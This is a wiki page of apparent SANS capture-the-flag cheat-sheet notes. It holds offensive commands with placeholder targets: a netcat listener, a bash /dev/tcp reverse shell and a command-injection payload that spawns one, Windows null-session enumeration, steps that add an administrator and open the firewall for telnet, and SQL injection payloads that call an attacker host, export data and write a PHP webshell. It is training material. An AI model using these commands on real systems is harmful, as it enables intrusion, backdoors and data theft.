sans_CTF

GnuPG keys

You will determine the passphrase for the given user from other aspects of the environment.
Remember users manually synchronize their passwords.

Where are they stored??

On Windows:

c:\Documents and Settings\[UserName]\Application Data\gnupg\pubring.gpg
c:\Documents and Settings\[UserName]\Application Data\gnupg\secring.gpg

On Linux:

/home/[UserName]/.gnupg/pubgring.gpg
/home/[UserName]/.gnupg/secgring.gpg

Verifying the Keys

gpg --list-keys
gpg --list-secret-keys

Decrypting a File Using GnuPG

gpg -d -o <OutputFileName> <EncryptedFileName>

TCPdump

tcpdump -nnp host <ipaddress>  and <icmp|tcp>

Netcat

See handout

Netcat-Style Shell Access without Access (Linux)

On attacker machine:

nc -l -v -l - [port]

#/bin/bash -i > /dev/tcp/<attackerIP>/<port> 0<&1

In your browser, on the affected server:

test; /bin/bash -i > /dev/tcp/<attackerIP>/<port> 0<&1 2>&1; echo hello

Commandline Tips

WINDOWS

NET COMMANDS

Null Session

net user \\<targetIP> "" /u:""

Get Users

To get users:
enum -U <targetIP>
To get groups:
enum -G <targetIP>

Add user via commandline

net user <username> <password> /add
net localgroup administrators <username> /add

List/Kill processes

tasklist/taskkill

SC Commands

Check if telnet is running?

sc query tlntsvr

Change startup type to demand (manually started)

sc config tlntsvr start= demand

Start Telnet server (or RDP Day 3, pg115)

sc start tlntsvr

Add user to TelnetClients if needed

net localgroup TelnetClients /add
net localgroup TelnetClients <username> /add

Poke a hole in the firewall

netsh firewall add portopening protocol = TCP port = 23 name = telnet mode = enable scope = custom address = <attackerIP>

LINUX

Enabling telnetd (D3p128) SSHD (D3,p129)

Getting terminal access around a firewall, using netcat to forward SSH to another port:
D3, p136

SQL Injection

MS SQL Server

exec master..xp_cmdshell 'ping <attackerIP>'--

Export Data to Attacker Machine
exec master..sp_makewebtask \\<attackerIP>\share\results.html, "select * from information_schema.tables"

MYSQL

and 1=0 union select '[PHP CODE]' INTO OUTFILE '/var/www/html/mycode.php'

PHP backdoor for MySQL on laptop, can be inserted into [PHP CODE]
Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-Share Alike 2.5 License.